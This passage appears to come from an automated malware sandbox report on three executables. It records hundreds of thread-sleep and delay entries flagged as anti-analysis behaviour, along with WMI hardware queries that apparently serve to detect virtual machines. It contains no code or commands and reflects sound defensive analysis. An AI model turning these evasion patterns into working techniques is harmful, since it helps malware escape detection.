Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -98282s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -98157s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -98032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -97922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -97813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -97688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -97563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -97422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -97294s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -97184s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -97075s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -96946s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -96824s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -96716s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -96573s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -96467s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -96356s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -96213s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe TID: 7884	Thread sleep time: -96090s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8100	Thread sleep count: 1358 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -99828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -99520s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -99292s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8100	Thread sleep count: 4720 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -99148s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -98672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -98547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -98437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -98218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -98109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -98000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -97871s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -97762s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -97640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -97531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -97422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -97312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -97193s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -97074s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -96953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -96464s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -96357s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -96249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -96125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -96015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -95906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -95797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -95687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -95578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -95468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -95359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe TID: 8088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 2852	Thread sleep count: 2196 > 30
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -99886s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 2676	Thread sleep count: 4986 > 30
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -99547s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -99437s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -99328s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -99219s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -99109s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -99000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -98891s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -98766s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -98641s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -98479s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -98341s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -98187s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -98075s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -97969s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -97859s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -97750s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -97640s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -97531s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -97422s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -97312s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -97203s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -97094s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -96984s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -96875s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -96765s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -96656s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -96546s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -96437s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -96328s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -96219s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -96078s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -95967s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 7280	Thread sleep time: -95789s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 2640	Thread sleep count: 5721 > 30
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 2640	Thread sleep count: 1653 > 30
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -99532s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -99407s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -99297s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -99188s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -99063s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -98938s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -98813s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -98688s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -98578s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -98469s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -98344s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -98235s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -98110s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -97985s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -97840s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -97715s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -97609s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -97493s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -97375s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -97266s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -97141s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -97016s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -96907s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -96782s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -96657s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -96547s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -96438s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -96313s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -96188s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -96063s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -95938s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -95828s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -95719s >= -30000s
Source: C:\Users\user\AppData\Roaming\ishon.exe TID: 5852	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\Ref#2056119.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\ishon.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Ref#2056119.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Ref#2056119.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ishon.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ishon.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\ishon.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ishon.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99764	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99655	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98999	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98670	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98543	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98421	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98312	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98179	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97998	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97796	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97687	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97575	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97343	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97234	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97124	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97015	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96901	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96781	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96671	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96562	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96453	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96343	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96230	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96109	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95999	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95888	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95765	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95656	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95546	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95435	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95324	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95194	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95078	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 94956	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 94830	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 99854	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 99704	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 99578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 99452	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 99330	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 99055	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 98860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 98735	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 98534	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 98407	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 98282	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 98157	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 98032	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 97922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 97813	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 97688	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 97563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 97422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 97294	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 97184	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 97075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 96946	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 96824	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 96716	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 96573	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 96467	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 96356	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 96213	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Thread delayed: delay time: 96090	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99828	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99520	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99292	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 99148	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98547	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98437	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98218	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98109	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 98000	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97871	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97762	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97640	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97531	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97422	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97312	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97193	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 97074	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96953	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96464	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96357	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96249	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96125	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 96015	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95906	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95797	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95687	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95578	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95468	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 95359	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99886
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99656
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99547
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99437
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99328
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99219
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99109
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 99000
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98891
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98766
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98641
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98479
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98341
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98187
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 98075
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97969
Source: C:\Users\user\AppData\Roaming\ishon.exe	Thread delayed: delay time: 97859
